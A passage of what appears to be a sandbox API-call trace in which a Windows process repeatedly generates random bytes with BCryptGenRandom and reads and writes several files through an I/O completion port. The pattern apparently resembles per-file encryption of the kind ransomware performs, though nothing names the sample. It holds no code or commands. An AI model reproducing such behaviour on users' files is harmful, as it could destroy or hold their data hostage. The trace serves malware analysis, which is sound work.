pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0165.069] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.069] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.069] free (_Block=0x3e305b8) [0165.069] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.069] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.069] free (_Block=0x1fa91d0) [0165.069] free (_Block=0x1fa2ed8) [0165.069] free (_Block=0x1fa90b8) [0165.069] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.079] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.080] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0165.080] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.081] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0165.081] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.081] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.081] free (_Block=0x3e305b8) [0165.081] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.081] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.082] free (_Block=0x1fa91d0) [0165.082] free (_Block=0x1fa2ed8) [0165.082] free (_Block=0x1fa90b8) [0165.082] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0165.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.093] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.093] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0165.093] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0165.094] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.094] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.094] free (_Block=0x3e305b8) [0165.094] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.094] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.095] free (_Block=0x1fa91d0) [0165.095] free (_Block=0x1fa2ed8) [0165.095] free (_Block=0x1fa90b8) [0165.095] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0165.095] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.096] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5080, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.096] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.097] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1fd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0165.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.100] CloseHandle (hObject=0x308) returned 1 [0165.100] free (_Block=0x1ff1e60) [0165.100] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.102] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x28ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0165.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.103] CloseHandle (hObject=0x2a8) returned 1 [0165.103] free (_Block=0x3f70048) [0165.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.119] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0165.119] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.119] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0165.120] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.120] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.120] free (_Block=0x3e305b8) [0165.120] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.120] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.120] free (_Block=0x1fa91d0) [0165.120] free (_Block=0x1fa2ed8) [0165.120] free (_Block=0x1fa90b8) [0165.120] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0165.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.127] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0165.127] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.127] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.127] free (_Block=0x3e305b8) [0165.127] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.127] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.128] free (_Block=0x1fa91d0) [0165.128] free (_Block=0x1fa2ed8) [0165.128] free (_Block=0x1fa90b8) [0165.128] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0165.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.241] CloseHandle (hObject=0x2a8) returned 1 [0165.241] free (_Block=0x3df0008) [0165.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.241] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.242] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0165.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.242] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0165.242] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.243] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.243] free (_Block=0x3e305b8) [0165.243] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.243] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.243] free (_Block=0x1fa91d0) [0165.244] free (_Block=0x1fa2ed8) [0165.244] free (_Block=0x1fa90b8) [0165.244] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.244] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.269] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa34, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.294] CloseHandle (hObject=0x2a4) returned 1 [0165.295] free (_Block=0x3df0008) [0165.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.304] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.311] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xc28, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0165.311] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.339] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.347] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.354] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1750, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0165.355] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.362] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.363] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0165.363] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.363] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0165.364] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.364] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.364] free (_Block=0x3e305b8) [0165.364] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.364] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.364] free (_Block=0x1fa91d0) [0165.364] free (_Block=0x1fa2ed8) [0165.364] free (_Block=0x1fa90b8) [0165.364] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0165.365] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.353] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xaf4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.353] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.353] CloseHandle (hObject=0x2a8) returned 1 [0166.353] free (_Block=0x1ff1e60) [0166.354] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.363] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.363] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0166.364] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.364] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0166.364] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.364] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.364] free (_Block=0x3e305b8) [0166.364] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.364] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.365] free (_Block=0x1fa91d0) [0166.365] free (_Block=0x1fa2ed8) [0166.365] free (_Block=0x1fa90b8) [0166.365] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.365] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.367] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5ab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.367] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.368] CloseHandle (hObject=0x2a8) returned 1 [0166.368] free (_Block=0x1ff1e60) [0166.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0166.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.381] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0166.381] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.381] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.381] free (_Block=0x3e305b8) [0166.381] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.381] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.382] free (_Block=0x1fa91d0) [0166.382] free (_Block=0x1fa2ed8) [0166.382] free (_Block=0x1fa90b8) [0166.382] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.383] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1d00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.383] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.395] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4124, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.397] CloseHandle (hObject=0x2a8) returned 1 [0166.397] free (_Block=0x1ff1e60) [0166.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.429] CloseHandle (hObject=0x2a4) returned 1 [0166.438] free (_Block=0x3df0008) [0166.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.461] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1402c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0166.472] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.475] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1ee4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, 